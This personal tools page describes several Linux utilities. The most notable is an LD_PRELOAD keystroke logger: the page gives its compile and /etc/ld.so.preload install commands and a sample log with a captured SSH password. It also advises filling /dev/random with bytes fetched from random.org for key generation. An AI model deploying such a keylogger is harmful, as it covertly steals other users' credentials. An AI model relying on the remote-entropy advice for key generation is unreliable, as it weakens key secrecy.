Tools

Keykass.so: Dynamic library for keystroke logging

Some articles about function interposition or syscall hooking inspired me to write this small library. Once it is loaded into a process (a bash program for instance), it wraps the read() function in order to append keystrokes into a world readable file. This is done by dynamically loading a pointer to the libc's read() function by using dlsym(), and declaring a fake read() function instead.

• Keykass 1.0 (download, view source)

The usual system calls on a Bash process when the "ls" command is typed:

$ strace -e read,write,open,close /bin/bash
[...]
read(0, "l"..., 1)                      = 1
write(2, "l"..., 1l)                    = 1
read(0, "s"..., 1)                      = 1
write(2, "s"..., 1s)                    = 1

The system calls on the same action while keykass.so is loaded:

read(0, "l"..., 1)                      = 1
open("/tmp/.bob.3845", [...], 0777)     = 3
write(3, "l"..., 1)                     = 1
close(3)                                = 0
write(2, "l"..., 1)                     = 1
read(0, "s"..., 1)                      = 1
open("/tmp/.bob.3845", [...], 0777)     = 3
write(3, "s"..., 1)                     = 1
close(3)                                = 0
write(2, "s"..., 1)                     = 1

Once the library has been set up (see below), wait for new shells to be opened on the system...

# gcc -shared -ldl -o /path/to/keykass.so keykass.c
# echo "/path/to/keykass.so" > /etc/ld.so.preload

... and you'll get your booty:

$ cat /tmp/.bob.*
ls /et<TAB>/etc
ssh -4x private.server.com
SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
St0ngPaSSw0rD!
hostname
w
exit

NOTE: In this example, some lines (such as "SSH-2.0-OpenSSH[...]") were not typed by our user, but they were logged because of processes (here, the ssh client's socket) that simply use our fake read().

Give us Chaos*!

Entropy is difficult to obtain on remote servers as it is moslty collected from hardware noises and especially from mouse movements and keyboard timings. Servers usually don't have those devices connected. The following piece of code retrieves random blocks of bytes from the Random.org website, and transform them with a "polynumeric" substitution cipher before adding them to your system's random device "/dev/random" until the entropy's spool gets full. This can be used when "/dev/random" is running out of entropy during cryptographic key generation.

• GUChaos 1.0 (download, view source)

# ./GUChaos
[+] GUChaos version 1.0
[+] Retrieve random bytes from http://random.org
[+] Adding 0x45558062 0x4ed6f80d ... 0xbce8af9b (status: 422/4096)
[+] Adding 0xfb8e9d76 0x214a0857 ... 0x2993012c (status: 678/4096)
[+] Adding 0xf2789051 0x4bf38816 ... 0xc49f2319 (status: 934/4096)
[...]
[+] Adding 0x725ebd88 0x89416b33 ... 0x90e2dcb4 (status: 4019/4096)
[+] Adding 0x70bd30b6 0x6d87a158 ... 0x8f669921 (status: 4096/4096)
[+] available entropy is set to the maximum (4096)

* = Entropy can be associated with chaos, disorder, etc.

Assh: The Anonymous Secure SHell

Assh, the Anonymous Secure SHell client is a SSH client for GNU/Linux and Mac OS X that uses free SSL proxies to establish anonymous ssh connection. This tool was included in various pen-test distros such as nUbuntu.

• Assh 2.3 (tar.gz, hosted by Sourceforge.net)

• Assh 2.2 (tar.gz, hosted by Sourceforge.net)

Pwd-hash: Get the hash of a given password

Pwd-hash is a password hashing tool that use the crypt function to generate the hash of a string given on standard input. You can optain different hashing schemes for your password (DES, MD5, SHA).

• pwd-hash 2.0 (tar.gz, sig)

• pwd-hash 1.2 (tar.gz, sig)

$ ./pwd-hash --help
Usage: ./pwd-hash <option>
Display the password hash of a string given on stdin.

Options are:

   --des		Traditional DES-based scheme
   --md5		MD5-based scheme (this is the default)
   --grub		MD5-based scheme with a 6 bytes salt (as used in GRUB)
   --sha		SHA-based scheme (SHA-512), libc version >= 2.7

   --salt <string>	Specify a salt instead of random string
   -n, --noecho		Do not echo input characters
   -h, --help		Display this help
   -v, --version	Display version

Examples: 

   $ echo "P4ssw0rD" | pwd-hash --md5
   $ pwd-hash --des <<<"P4ssw0rD"
   $ pwd-hash --noecho --sha
   $ pwd-hash --salt "abcdefgh" --md5

Report bugs to <vladz@devzero.fr>.

CGI-Captcha: Protect your HTML forms against spam

A small captcha tool to protect your html forms against spam. It's written in CGI and uses the ImageMagick tool called 'convert'.

• captcha 1.0 (tar.gz, sig)